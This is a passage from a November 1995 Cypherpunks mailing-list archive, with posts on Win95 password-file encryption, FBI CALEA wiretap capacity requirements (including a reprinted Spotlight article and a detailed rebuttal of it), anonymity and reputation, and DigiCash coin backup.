your wallet has an hole, of if you throw away your money, you won't
whine to the ATM, would you ?

dl
--
Laurent Demailly * http://hplyot.obspm.fr/~dl/ * Linux|PGP|Gnu|Tcl|...  Freedom
Prime#1: cent cinq mille cent cinq milliards cent cinq mille cent soixante sept

cryptographic PLO Legion of Doom explosion Cocaine Castro Croatian





From joelm at eskimo.com  Thu Nov  2 18:25:34 1995
From: joelm at eskimo.com (Joel McNamara)
Date: Fri, 3 Nov 1995 10:25:34 +0800
Subject: Win95 password caching
Message-ID: <199511030120.RAA06496@mail.eskimo.com>


I was under the impression that MS used some variation of DES for encrypting
the password lists (obviously much more secure than the nonsense XOR
encryption used for the screen savers).

Joel

>This was not the question. He wants to prevent local Windows passwords
>from being created for network-only users. This is a serious security
>issue, because if a user enters her real network password for the Windows
>password, and someone else later picks up the .PWL files, which are not
>encrypted in a particularly secure way, then someone can get unauthorized
>access to the network as the previous user(s).






From perry at piermont.com  Thu Nov  2 18:40:14 1995
From: perry at piermont.com (Perry E. Metzger)
Date: Fri, 3 Nov 1995 10:40:14 +0800
Subject: FBI seeks huge wiretapping system
In-Reply-To: <9511022308.AA08199@zorch.w3.org>
Message-ID: <199511022333.SAA06934@jekyll.piermont.com>



hallam at w3.org writes:
> 
> >Indeed, I have searched both the constitution and my collected works
> >of Nietzsche and found no reference to the inalienable right of
> >governments to listen in on any conversations, let alone the 1% of
> >conversations the FBI wants access to. 
> 
> Nietzsche is not a recognised authority on the US consititution nor
> are his works on ethical systems particularly definitive.

I was being facetious. The point is that the government has no
inherent right to tap our phones -- indeed, it didn't do so for nearly
the first 200 years of our existance, and we did just fine -- better,
in fact. Who among us has felt SAFER since they gained the ability?
Has anyone been feeling more and more safe with time, since the more
and more draconian laws granting the government more and more
authority should have been "fixing" things, right?

> Even within the Nietzschian system of ethics it is very clear that 
> listening in on the telephone conversations of "the botched and the
> bungled" would lie well within the rights of super-man. Indeed he
> is very explicit that there is no logical need for these people to
> have rights of any sort. Their lives are at the disposal of the great
> leader.

Actually, thats a complete misinterpretation of Nietzsche, but thats
another story.

Perry





From fc at all.net  Thu Nov  2 18:49:28 1995
From: fc at all.net (Dr. Frederick B. Cohen)
Date: Fri, 3 Nov 1995 10:49:28 +0800
Subject: Anonymity and integrity
In-Reply-To: <199511021934.OAA22117@opine.cs.umass.edu>
Message-ID: <9511022111.AA15199@all.net>


Futplex <futplex at pseudonym.com> opines:

... [example was here - saving bandwidth]...

> It seems to me that the integrity of the statements was rather easily verified
> based on the merits of the statements themselves. In particular, one or two
> participants in the forum denied the claims made that they were members of
> the editorial board.
> 
> Granted, some people would have been more inclined to look askance at the
> messages if they had known the author's True Name. But as the saying goes,
> "past performance is not a guarantee of future results". You can choose to
> doubt or believe a message because of the author's past reputation. But
> reputation is not a reliable predictor of the integrity of future assertions.
> It's a nice psychological crutch, but reliance on a "rational expectation" is
> a long way from anything I would call "assurance" or "verification". It
> doesn't prove anything. The only acceptable method of assurance I can see is
> careful analysis of the propositions posited, and empirical verification of
> the facts presented. Leaning on past reputation is accepting an odd form of
> Proof by Authority.

You are correct in stating that it doesn't prove anything, but that, it
seems to me, is universally true.  Nothing you can ever do can prove
absolute integrity.  The issue then comes down to whether you get more
integrity by knowing (or having access to) the full body of informaiton
about a source.  I think you do.

> As it happened I had never heard of the True Name of the sender, so the
> knowledge wasn't useful to me.

But with the name, if you had chosen to, you could have done a great
deal to learn about the history of the individual - through his
published works, the many fine and not so fine things he has done in his
career, etc.  It is the availability of this reference material that
makes the identity that much more useful. 

> > I understand that over time, reputations can be built up for pseudonyms
> > (which are not necessarily anonyms) but then, with a pseudonym we might
> > reasonably ask what the motive is for hiding the real identity.  
> [possible motives...]
> > Without knowing the motive, how can we assess the statements? 
> 
> By asking yourself if they seem to make sense, checking them against known
> facts and beliefs, etc. The same methods, IMHO, that are mainly appropriate
> to assess anyone's statements.

It is interesting that you take this line, especially in a forum where
so many people trust so much that is posted without verifying it.  For
example, who on the cypher punks list verified the posting made by the
people from MIT regarding Java?  Was it simply the trusted MIT name that
caused you to take int on faith?

One of the underlying assumptions of the scientific establishment, and
in fact science itself, is that results be published and verifiable, but
in reality, almost all results are not verified, and even the most
startling results aren't verified before many people begin to place
trust in them.

Example of a relatively quick response to such an assertion was the Cold
Fusion situation a few years ago.  On the other hand, the professor at
the University of Pittsburgh who published results based on faked data
(this is a gross simplification, I know) was widely believed for many
years.

The fact is that, today, there are simply too many results to verify
them all along with the underlying data they depend on, the software
used to generate them, etc.  As a result, we are increasingly left with
trusting the people rather than the results.  Another issue is that the
resources required to reproduce "big science" are not available to most
people.  Has anyone reproduced Adleman's experiments on bilogical
computation? I know of nobody that has, and would love to do it myself,
but I don't have the necessary equipment.  This is an Earthshaking
result with enormous long-term consequences, and I'm certain it's right
because I agree with the underlying theory and don't see any reason for
anyone to lie about it, but if Nostragnia of the Crydon Republic had
published it anonymously, I would be much more hesitant to accept it
and so would you (all).

> > In fact, how can we know that the original pseudonym still
> > applies? Someone could kill you and take over your pseudonym, and even
> > though we might hear of your death, the pseudonym might continue based
> > on your reputation but with another actual source.
> 
> Of course, the is-a-person problem has been discussed at great length. 
> Digital signatures are as effective for pseudonyms as for anyone else.
> The messages we've seen "from Alice de `nonymous" might all have come from
> different senders. They exhibit a common tone and style, but that doesn't
> assure us of anything. In a sense that makes them more inviting,
> since there's always the chance that a third party is attempting a clever
> parody or a sly bit of character assassination.

The question is not whether the signature is right, but rather, are
there other reasons to believe or not believe - trust or not trust -
etc.  the sender.  The less anonymity, the better this is revealed.

> [...]
> > It's an interesting concept that each statement should/could be taken on
> > its own and evaluated independently of the rest of a person's life
> > context, but in my experience, that has serious problems.
> 
> In my experience, that's about all I can usually do in network communication.
> In principle I _could_ devote scads of time to background investigations of
> my correspondents, for all except strongly anonymous and strongly 
> pseudonymous parties, but I don't find that approach realistic.

The point of non-pseudonyms is that if you want to know you can try to
find out.  If others know additional relevant information and decide to
reveal it, you can tell that much the better.  It also reuces blatant
character assasination (which brings some level of civility) and forces
people to take personal responsibility for what they say and do.  All
of these things, in my opinion, increase integrity.

-- 
-> See: Info-Sec Heaven at URL http://all.net
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236





From enzo at ima.com  Thu Nov  2 20:13:39 1995
From: enzo at ima.com (Enzo Michelangeli)
Date: Fri, 3 Nov 1995 12:13:39 +0800
Subject: censored? corrected [Steve Pizzo cited in The Spotlight]
In-Reply-To: <Pine.ULT.3.91.951102013958.18049A-100000@Networking.Stanford.EDU>
Message-ID: <Pine.LNX.3.91.951103114116.20782B-100000@ima.net>


On Thu, 2 Nov 1995, Rich Graves wrote:

> > 
> >    In Hong Kong, the Internet wasn't quite strangled, but the British
> > authorities who control that colony managed to throttle free electronic
> > speech with the rest of the world until everything was bottlenecked into
> > a few little-known satellite links.
> 
> Hmm, few specifics here. I wonder if they would care to elaborate. Nah.

Don't waste your time with that idiot, he doesn't know what he's talking
about. The 1-week partial black-out here in Hong Kong happened because some
providers had ignored some licencing requirements, and has been quickly
solved once they agreed to comply.







From perry at piermont.com  Thu Nov  2 20:50:06 1995
From: perry at piermont.com (Perry E. Metzger)
Date: Fri, 3 Nov 1995 12:50:06 +0800
Subject: Radiation Detectors from Aware Electronics
Message-ID: <199511030430.XAA07086@jekyll.piermont.com>



There have been several requests for information on the company that
makes the radiation detectors with RS232 interfaces that I mentioned.

Here is how to reach them:

Aware Electronics
P.O. Box 4299
Wilmington, DE 19807
Phone (800) 729-5397
      (302) 655-3800


Perry





From clarkm at cnct.com  Thu Nov  2 21:33:13 1995
From: clarkm at cnct.com (clarkm at cnct.com)
Date: Fri, 3 Nov 1995 13:33:13 +0800
Subject: Clinton Administration Plans 1.5 MILLION WIRETAPS
Message-ID: <9511030814.AA0039@cnct-gw.new-york.net>




                      Used with Permission

                       From THE SPOTLIGHT
                  300 Independence Avenue, S.E.
                      Washington, DC  20003

                 Subscriptions:  (202) 546-5621


                      Technology & Liberty
                        November 13, 1995


      ADMINISTRATION PLANS 1.5 MILLION TELEPHONE INTERCEPTS

                        By Clark Matthews
                   clark.matthews at paranet.org

Janet Reno's Justice Department and the FBI have directed U.S.
telephone companies to prepare for up to 1.5 million
simultaneous, electronic intercepts on Americans' telephones.

The same directive requires the nation's phone companies to
complete the necessary modifications to their equipment to create
this massive surveillance apparatus from America's public
telephone networks.  Telephone companies are directed to have
these capabilities in place by October 28, 1998, one week before
the 1998 elections.

The Clinton administration's claimed authorization for this
massive high-tech domestic surveillance machine is the 1994
Communications Assistance for Law Enforcement Act (CALEA).  The
CALEA law is better known as infamous "Wiretap Access Bill",
which has been discussed many times in these columns over the
past 14 months.  The CALEA law continues to be a hot topic
because the proposed "Omnibus Counter-Terrorism Bill" of 1995
(H.R. 1710) contains provisions for setting up a national FBI
surveillance center and paying for the national eavesdropping
system with a 40% surcharge on all federal civil fines and
property seizures.  

                     "CAPACITY REQUIREMENTS"

The administration's eavesdropping diktats are buried in a set of
technical "capacity requirements" that telephone companies are
expected to meet in order to comply with the CALEA law.  The
capacity requirements appear on pages 53643-53646 of the Federal
Register for October 16, 1995.  Computer users can access this
document electronically on the internet from the Electronic
Privacy Information Center (http://www.epic.org) or by using wais
(wais.access.gpo.gov).

The "Capacity Requirements" published in the Federal Register
correspond to a minimum of 540,000 and a maximum of 1.5 million
simultaneous telephone "intercepts" in the United States.  These
electronic "intercepts" involve several different telephone
surveillance techniques.  They can record the telephone numbers
you call and the numbers of people who call you, and then match
the phone numbers in a special database "associating" you with
your friends, relatives, acquaintances, journalists, activists,
or businesses.  They can also be programmed to monitor telephone
conversations, intercept faxes, and record communications
sessions between computer modems, including computer passwords
and digital transactions.

Here is a breakdown of the scope of the federal surveillance
described by the capacity requirements:

 *   Category 3 -- In 75% of the nation, phone companies must be
     prepared to activate federal intercepts on a maximum of
     0.25% of all telephone subscribers, i.e. 250 telephones out
     of every 100,000.

 *   Category 2 -- Is ill-defined.  Phone companies in Category 2
     areas must make their equipment capable of supporting
     federal interceptions on a maximum of 0.5% of all
     subscribers, i.e. 500 telephones per 100,000

 *   Category 1 -- Includes ill-defined "high interest" areas
     like major cities, where phone companies must be prepared to
     surveil 1% of all telephones, i.e. 1,000 phones per 100,000 

                       WHAT THE NUMBERS MEAN

According to FCC statistics for 1993, there were at least 150
million telephone numbers in our country -- and these figures
omitted cellular phones, beepers, pagers, WATS lines, and other
non-switched telephone services.  Therefore Category 3 translates
into 0.25% of at least 112.5 million telephones -- 281,250
intercepts nationwide.  Assuming Category 2 equals 15% of the
nation's phones, it translates into 0.5% of 22.5 million phones,
another 122,500 potential wiretaps.  Category 1 is 1% of the
remaining 15 million phones:  that's 150,000 more people.  Add it
up: 553,750 intercepts, minimum.

And since "major cities" are "high interest" areas, the actual
number is more likely to approach one million or more.  Even
these figures don't tell the whole story.  The Justice Department
directives have a built-in vagueness that allows areas to be re-
defined.  They can become "high-interest" hotspots at any time,
under any circumstances.  A currency crisis, for instance.  Or a
hotly contested election.  Or perhaps a mysterious bombing
provocation in the midwest.

Furthermore, telephone companies do not have the luxury of
meeting the minimum surveillance requirements.  It's a
technological reality that they must modify their equipment to
meet the maximum requirements.  That's because the FBI can re-
define their surveillance responsibilities at any time, by
branding their customers as "interesting".  

As the FBI's "interest" shifts from area to area, the whole
country could rapidly come under the 1% surveillance directive.
1.5 million telephone intercepts.  Or more.

                      'ONLY 1,157 WIRETAPS'

The conduct of Clinton's law-enforcement leaders is especially
outrageous, now that the true intentions of their KGB-like
program have been revealed.  When FBI Director Louis Freeh
lobbied Congress for the Wiretap Bill last year, he cited FBI
statistics claiming only 1,157 federal, state, and local
electronic surveillance orders for all of 1993.  

In sworn Congressional testimony, the FBI director went on to say
that his bureau had been thwarted in "several" attempts to
intercept communications on specialized telephone equipment.
Freeh cited obstacles like digital switches, digital loops, and
similar privately owned, computerized business telephone
switching systems, which he claimed prevented his agents from
listening to telephone conversations, intercepting faxes, and
capturing the data exchanged in computer modem sessions.

The built-in interception capacity of at least 1.5 million phone
subscribers is well over 1,000 times the 1993 wiretapping number
given to Congress by Director Freeh. 

                   WRITE YOUR REPRESENTATIVES

The Justice Department instructed America's telephone companies
to respond by November 15th in writing (in triplicate) with
comments on their new national telephone surveillance
requirements.  Why not ask your elected representatives to drop
them a line, too?  Your Senators and Representative may well
wonder how Louis Freeh's 1,157 1993 surveillance orders and
"several" failed eavesdropping attempts turned into a license to
monitor over a million phones in the nation's telephone system in
less than two years.  I sure do wonder.

The "capacity requirements" for the 1994 Wiretap Law (CALEA) were
published in the Federal Register of October 16.  They are listed
on pages 53643-53646.  The address for comments is:
Telecommunications Industry Liaison Unit (TILU), Federal Bureau
of Investigation, P.O. Box 220450, Chantilly, VA 22022-0450.  The
FBI expects your representatives to write in triplicate.



     
      .---.        .----------- *     ::::::::::::::::::::::::::::
     /     \  __  /    ------ *        clark.matthews at paranet.org
    / /     \(..)/    ----- *         ::::::::::::::::::::::::::::
   //////   ' \/ `   ---- *
  //// / // :    : --- *                     PERMISSION TO
 \\/ / * / /`    '--*                        COPY / REPOST
  \*/      * //..\\
       x-x-UU----UUx-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x
           '//||\\`  N E M O..M E..I M P U N E..L A C E S S I T
       x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x
     
     





From wilcoxb at nagina.cs.colorado.edu  Thu Nov  2 22:36:15 1995
From: wilcoxb at nagina.cs.colorado.edu (Bryce)
Date: Fri, 3 Nov 1995 14:36:15 +0800
Subject: [NOISE] Re: censored? corrected [Steve Pizzo cited in The Spotlight]
In-Reply-To: <Pine.LNX.3.91.951103114116.20782B-100000@ima.net>
Message-ID: <199511030614.XAA02702@nagina.cs.colorado.edu>



-----BEGIN PGP SIGNED MESSAGE-----

> On Thu, 2 Nov 1995, Rich Graves wrote:
> 
> > > 
> > >    In Hong Kong, the Internet wasn't quite strangled, but the British
> > > authorities who control that colony managed to throttle free electronic
> > > speech with the rest of the world until everything was bottlenecked into
> > > a few little-known satellite links.
> > 
> > Hmm, few specifics here. I wonder if they would care to elaborate. Nah.
> 
> Don't waste your time with that idiot, he doesn't know what he's talking
> about. The 1-week partial black-out here in Hong Kong happened because some
> providers had ignored some licencing requirements, and has been quickly
> solved once they agreed to comply.


That's one way to look at it.  Of course since the "license 
requirements" had to do with some obscure administrivia that nobody
thought would apply to ISP's, none of the 6 or so ISP's in Hong Kong
had thought to apply for it.  One has to wonder why the gov't pulled
the plug on 5 of them without so much as a warning, much less a
chance to comply.


Did I say 5?  Oh yes.  The largest HK ISP-- and the one with closest
ties to the government-- had gone ahead and applied for the license
just a couple of weeks before the blackout.  Corruption is the modus
operandi in HK, so I wouldn't be at all surprised if that one ISP
got a special favor by being warned of the impending black-out, or
even if it had a hand in instigating it.


I'm sure you'll correct me if I've got any of my facts wrong.


(c'punks relevance:  (parts of) the Net is still vulnerable to
governmental blackout.  Is this relevant?  Well, hardly, but perhaps
interesting.  And at least I flagged it.)


Regards,

Bryce

signatures follow

            "To strive, to seek, to find and not to yield."   
    <a href="http://ugrad-www.cs.colorado.edu/~wilcoxb/Niche.html">

                          bryce at colorado.edu                   </a>


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Auto-signed under Unix with 'BAP' Easy-PGP v1.01

iQCVAwUBMJmy8PWZSllhfG25AQHUygP/QKCwtGlzRRaJtCANUgiJgt+noq0RJKWe
zpthAqKRJEa0kP1/zZBkk0Qkj/+HJWAJZ1+i/9R887cDkyD8JZSu2XJ4pXB4mpsv
9rgxH4ffj8oxvy9e313/Z7C2zm7x1O3dwvnkKDojg8LuUBCTvHxZo5iwKXNqExYv
w/B0Fxbv0V8=
=BPjm
-----END PGP SIGNATURE-----





From llurch at networking.stanford.edu  Thu Nov  2 22:38:20 1995
From: llurch at networking.stanford.edu (Rich Graves)
Date: Fri, 3 Nov 1995 14:38:20 +0800
Subject: FBI Wants to Wiretap One of Every 100 Phones in Urban Areas
In-Reply-To: <9511030810.AA0038@cnct-gw.new-york.net>
Message-ID: <Pine.ULT.3.91.951102220145.25597C-100000@Networking.Stanford.EDU>


-----BEGIN PGP SIGNED MESSAGE-----

On Fri, 3 Nov 1995 clarkm at cnct.kom wrote:

> Thanks for this item!  Two little excerpts jump out at me.

Gee, I hope they didn't spook you too badly when they jumped out at you 
like that. I can tell you're a little jumpy.

> > Last year, federal and state courts authorized 1,154 wiretaps, of which
> > 48 percent
> 
> [snip]
> 
> > "People are starting to say that seems awfully high," Dempsey said, noting 
> > that
> > the overall level of such surveillance activity is now a total of 20,000 
> > to 25,000
> > intercepts nationwide over an entire year.
> 
> So what is it?  1,154 wiretaps?  Or 20,000?

Easy: both. 1,154 wiretaps, and 20K to 25K intercepts, which includes both 
wiretaps and other interceptions, i.e., recording which phone numbers you 
call but not actually listening to the conversations.

Get out of Dodge.

> FBI Director Louis Freeh testified under oath to 1,157.  The FBI was asked
> for the data to support those numbers.  The FBI refused to release them 
> until the year 2002.
> 
> The FBI is being sued under FOIA to support Freeh's sworn testimony.  (Of
> course, he used different numbers at different times....)

By whom is the FBI being sued? What is the case number? Who are the 
lawyers? What are their Bar numbers? How many times have they been 
disciplined for bringing frivolous suits?

> One last thing.
> 
> What's so special about the year 2002?  

Obviously, it is two elections from now, when the UN will invade the US 
to impose the rule of the Anti-Christ.

Oops, I wasn't supposed to say that.

- -rich

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMJmyX43DXUbM57SdAQGSpAQAw5sutFZdFyNu24bU1Pvd5n/BitCO/6/X
7ZywmguZTtduCCjfvAe2zD7KWu/Mlxrm3ATQSnUH6Vyjr1BAo/TnbrZzjdjWRQw1
S8n7PtLbDiHPOxgocC4JYnITYO5Lasx81V5lhJv5ifC0W8QGaqdLIZnfvws4K/N+
ONHnqzjRwSc=
=FSoO
-----END PGP SIGNATURE-----





From sharborth at hai-net.com  Thu Nov  2 22:41:31 1995
From: sharborth at hai-net.com (sharborth at hai-net.com)
Date: Fri, 3 Nov 1995 14:41:31 +0800
Subject: Radiation Detectors from Aware Electronics
Message-ID: <9510038153.AA815390510@houston_cc_smtp.hai-net.com>


     So what does this have to do with this mailing list??
     
     Skip


______________________________ Reply Separator _________________________________
Subject: Radiation Detectors from Aware Electronics
Author:  perry at piermont.com at internet
Date:    02-11-95 23:45


There have been several requests for information on the company that 
makes the radiation detectors with RS232 interfaces that I mentioned.
     
Here is how to reach them:
     
Aware Electronics
P.O. Box 4299
Wilmington, DE 19807
Phone (800) 729-5397
      (302) 655-3800
     
     
Perry






From tcmay at got.net  Thu Nov  2 22:55:37 1995
From: tcmay at got.net (Timothy C. May)
Date: Fri, 3 Nov 1995 14:55:37 +0800
Subject: What!!!
Message-ID: <acbef6c303021004c367@[205.199.118.202]>


At 11:25 PM 11/2/95, tony266 at vabeach.email.net wrote:

>Can someone tell me this cypherpunks is all about???

Grammar not best subject his. List sense make after read for time.

--Klaus!

More seriously, when you subscribed you undoubtedly got a "Welcome"
message. I suggest you read it.

Reading topics that interest you on the list is the best way to learn what
it "is all about." The Cypherpunks list archives and Cyphernomicon are also
useful. They are in various places, including these Web sites:

http://www.hks.net/cpunks/index.html

http://www.oberlin.edu/~brchkind/cyphernomicon/

--Tim May



Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay at got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."







From clarkm at cnct.com  Thu Nov  2 23:37:43 1995
From: clarkm at cnct.com (clarkm at cnct.com)
Date: Fri, 3 Nov 1995 15:37:43 +0800
Subject: FBI Wants to Wiretap One of Every 100 Phones in Urban Areas
Message-ID: <9511031007.AA0024@localhost>


> On Fri, 3 Nov 1995 clarkm at cnct.kom wrote:
> 
> > Thanks for this item!  Two little excerpts jump out at me.
> 
> Gee, I hope they didn't spook you too badly when they jumped out at you 
> like that. I can tell you're a little jumpy.

Hi Rich!  Thx for changing my domain, I'm sure it fooled SAIC.

> > So what is it?  1,154 wiretaps?  Or 20,000?
> 
> Easy: both. 1,154 wiretaps, and 20K to 25K intercepts, which includes both 
> wiretaps and other interceptions, i.e., recording which phone numbers you 
> call but not actually listening to the conversations.
> 
> Get out of Dodge.

You get out of Dodge.

1,154 electronic surveillance orders, about 7,000 pen registers & trap/trace
plus 500 FISA warrants, all 1993 if memory serves.

Figures as supplied to EPIC, and from memory.

> By whom is the FBI being sued? What is the case number? Who are the 
> lawyers? What are their Bar numbers? How many times have they been 
> disciplined for bringing frivolous suits?

EPIC.

Quick!!  Fire up your index!

> > What's so special about the year 2002?  
> 
> Obviously, it is two elections from now, when the UN will invade the US 
> to impose the rule of the Anti-Christ.
> 
> Oops, I wasn't supposed to say that.

But now that you have...

Check out the wiretap stats and FOIA responses at http://www.epic.org and 
come back & quibble some more.
     
      .---.        .----------- *     ::::::::::::::::::::::::::::
     /     \  __  /    ------ *        clark.matthews at paranet.org
    / /     \(..)/    ----- *         ::::::::::::::::::::::::::::
   //////   ' \/ `   ---- *
  //// / // :    : --- *                     PERMISSION TO
 \\/ / * / /`    '--*                        COPY / REPOST
  \*/      * //..\\
       x-x-UU----UUx-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x
           '//||\\`  N E M O..M E..I M P U N E..L A C E S S I T
       x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x
     
     





From llurch at networking.stanford.edu  Thu Nov  2 23:50:12 1995
From: llurch at networking.stanford.edu (Rich Graves)
Date: Fri, 3 Nov 1995 15:50:12 +0800
Subject: [NOISY] Re: Clinton Administration Plans 1.5 MILLION WIRETAPS
In-Reply-To: <9511030814.AA0039@cnct-gw.new-york.net>
Message-ID: <Pine.ULT.3.91.951102221403.25597D-100000@Networking.Stanford.EDU>


-----BEGIN PGP SIGNED MESSAGE-----

On Fri, 3 Nov 1995 clarkm at cnct.com wrote:

Ah, Clark graces us with his presence. See articles
<46kf2u$4ck at mars.cnct.com> and <45ch8o$915 at mars.cnct.com>. I especially
enjoyed <44l7r9$dsv at mars.cnct.com>.

>                        From THE SPOTLIGHT
>                   300 Independence Avenue, S.E.
>                       Washington, DC  20003

Here's a little more information on this fine publication, which is in the
forefront of the struggle to expose the truth about the United Nations'
responsibility for the bombing of the Oklahoma Federal Building. Note the
second Library of Congress topic classification. The Spotlight is often
cited in alt.revisionism. Larger University libraries usually carry it;
I know Stanford and Berkeley do.

TITLE:    Spotlight (Washington, D.C.)
          The Spotlight.
          The Spotlight (Washington)
IMPRINT:  Washington, Liberty Lobby.
          v. ill. 39 cm.
TOPICS:   United States--Politics and government--1969---Periodicals.
          Antisemitism--Periodicals.
          Conservatism--United States--Periodicals.
NOTES:    Weekly (except two issues combined into one at beginning of year)
          v. 2, no. 16-     Apr. 19, 1976-
          Continues: National spotlight
          Language: English   Year: 1976-
          ISSN 0191-6270

>                       Technology & Liberty
>                         November 13, 1995
> 
> 
>       ADMINISTRATION PLANS 1.5 MILLION TELEPHONE INTERCEPTS
> 
>                         By Clark Matthews
>                    clark.matthews at paranet.org
> 
> Janet Reno's Justice Department and the FBI have directed U.S.
> telephone companies to prepare for up to 1.5 million
> simultaneous, electronic intercepts on Americans' telephones.

This is not true. This is a trial balloon, not a directive;  it's a first,
wet dream draft at the beginning of a public comment period. It is dead 
on arrival.

It will not be implemented, not if we have any say in the matter, and we
do. Please do chime in, though, based on EPIC's responsible analysis and
recommendations. 

> The same directive requires the nation's phone companies to
> complete the necessary modifications to their equipment to create
> this massive surveillance apparatus from America's public
> telephone networks.  Telephone companies are directed to have
> these capabilities in place by October 28, 1998, one week before
> the 1998 elections.

This is not true.

[Tin-foil-hat-tinged plagiarism of EPIC's alert deleted]

> The administration's eavesdropping diktats are buried in a set of
> technical "capacity requirements" that telephone companies are
> expected to meet in order to comply with the CALEA law.  The
> capacity requirements appear on pages 53643-53646 of the Federal
> Register for October 16, 1995.  Computer users can access this
> document electronically on the internet from the Electronic
> Privacy Information Center (http://www.epic.org) or by using wais
> (wais.access.gpo.gov).

The second and third sentences are true. If you are a US citizen (natural 
born White Sovereign State Citizen or otherwise), please follow up on 
them. Let your voice be heard.

The first sentence has at least four readily apparent logical and 
factual flaws.

> or businesses.  They can also be programmed to monitor telephone
> conversations, intercept faxes, and record communications
> sessions between computer modems, including computer passwords
> and digital transactions.

Not if they're encrypted, they can't :-)

> Here is a breakdown of the scope of the federal surveillance
> described by the capacity requirements:

[All plagiarized from the EPIC alert; a few errors, but nothing major]

> And since "major cities" are "high interest" areas, the actual
> number is more likely to approach one million or more.  Even
> these figures don't tell the whole story.  The Justice Department
> directives have a built-in vagueness that allows areas to be re-
> defined.  They can become "high-interest" hotspots at any time,
> under any circumstances.  A currency crisis, for instance.  Or a
> hotly contested election.  Or perhaps a mysterious bombing
> provocation in the midwest.

This is completely untrue. Cite please?

> Furthermore, telephone companies do not have the luxury of
> meeting the minimum surveillance requirements.  It's a
> technological reality that they must modify their equipment to
> meet the maximum requirements.  That's because the FBI can re-
> define their surveillance responsibilities at any time, by
> branding their customers as "interesting".  

Cite?
 
>                    WRITE YOUR REPRESENTATIVES

Yes, please do. The facts are rather disturbing. Clark's transcription 
leaves a little to be desired, so I quote EPIC:

WHAT YOU CAN DO:

(a) Express support for Rep. Bob Barr (R-GA), a former federal prosecutor 
and leading Congressional
opponent of the FBI's request for wiretap funding: 

     Rep. Bob Barr
     U.S. House of Representatives
     1607 Longworth Building
     Washington, DC 20515
     (202) 225-2931


(b) Submit comments to the FBI. Object to the "percentage approach" to
wiretap capacity. Urge the FBI to follow the current measurement of
wiretapping, as reported annually by the Administrative Office of the U.S.
Courts, which considers the actual number of wiretaps authorized. If you
are a telephone customer, ask the FBI to address the privacy risks of
unauthorized, illegal, or excessive wire surveillance. Comments should be
submitted in triplicate to the Telecommunications Industry Liaison Unit
(TILU), Federal Bureau of Investigation, P.O. Box 220450, Chantilly, VA
22022-0450. Send copies of your comments to EPIC (alert at epic.org) and
Congressman Barr. 

                 ** Comments must be received by November 15, 1995. **

(c) If you represent or work for a telecommunications company, equipment
manufacturer, or service provider, assess carefully the cost and liability
that this proposed federal regulation may impose on your company and the
risk that it may expose your customers to illegal wiretapping. If you are
interested in challenging the final FBI rule, contact EPIC. 

[BUAF of a birdie deleted]

- -rich


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMJnAZ43DXUbM57SdAQF5cAP8CebPae9psvfau4nUGUr0bi81cuqQEjlb
jm0va0q3tlRV18Xd+vXUOjjd6+Mwkjfd0kh74q2IUWbSVHA2ECy5sHgF5oGoSiLP
WJdh3nTGlrtrj/oiYQloaun/lUiq27L4Z6sQPNNNwNmldt8zzPCRJUBACBg0+qLS
kmxvepC/7Uo=
=3F8Z
-----END PGP SIGNATURE-----





From jirib at cs.monash.edu.au  Thu Nov  2 23:55:51 1995
From: jirib at cs.monash.edu.au (Jiri Baum)
Date: Fri, 3 Nov 1995 15:55:51 +0800
Subject: Chaum's cash: backup?
In-Reply-To: <199510241312.OAA00644@digicash.com>
Message-ID: <199511030729.SAA03867@molly.cs.monash.edu.au>


-----BEGIN PGP SIGNED MESSAGE-----

Hello Marcel van der Peijl,
> From: "Marcel van der Peijl" <bigmac at digicash.com>
> Date:          Tue, 24 Oct 1995 14:10:58 +0100

Sorry about taking so long to reply... I'll quote more than usual
to make up for it.

> > > I could give a hint: your random state initializer is not the too-often 
> > > used srand( time( NULL ) ) but user-chosen during installation.

> > This sounds great... Will the bank be running crack against the proto-coins
> > it gets? (Say, at the behest of a LEA?)

> It is not the bank's intention to screw the clients, but mostly the 
> other way around.

I was referring to the claim that the system is payer-anonymous.

Thinking of it again now, what's to stop Eve the eavesdropper from spying
on the proto-coins, running crack against it, and then (later) 
eavesdropping on the bank-signed coins and unblinding/depositing them 
before Alice/Bob does?

(No, being encrypted by the bank's public key is not enough.)

> If the bank wants to screw the clients the easiest 
> way is to change their account balance. Remember, you trust them with 
> your money. That's why they're a bank.

Yes, but is the bank really interested in protecting privacy?

> > Is there any way for the user to re-initialize the random state?
> > > Write that initializer down and you can re-generate all coins.
> > ...
> > That's going to be one hell of a valuable piece of paper.
> > (Certainly to your enemies/prosecutors - it reveals the blinding factors
> > for every coin you ever spent.)

> You may choose to burn it or change random state and have no 
> recoverability. What do you value more? Your privacy or your money? 
> Each user will have too choose.

a) It would be nice if the protocol didn't require this choice.

b) This choice should be made explicit to the user.

c) As I noted above, wouldn't it also strongly reduce security?


See you!

Jiri
- --
<jirib at cs.monash.edu.au>     <jiri at melb.dialix.oz.au>     PGP 463A14D5

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i

iQCVAwUBMJnEeCxV6mvvBgf5AQF2BwP/XdMn6ktMGjToDltqo014kT1i3Z/GGXPr
HPW1gBN3RT3Ba9F2Ac+24IVVFqauo1sT+Ecc872UrlQzoF8S524oZfhjh3IW5xRF
mpZX48tnQn5nJE/U4XgvcuQ6yw5JOhc2eEVPs2PnKT+RdUogNb9UDAXOKn6+EILc
nqosNXK+aMU=
=geHb
-----END PGP SIGNATURE-----





From enzo at ima.com  Fri Nov  3 00:34:17 1995
From: enzo at ima.com (Enzo Michelangeli)
Date: Fri, 3 Nov 1995 16:34:17 +0800
Subject: [NOISE] Re: censored? corrected [Steve Pizzo cited in The Spotlight]
In-Reply-To: <199511030614.XAA02702@nagina.cs.colorado.edu>
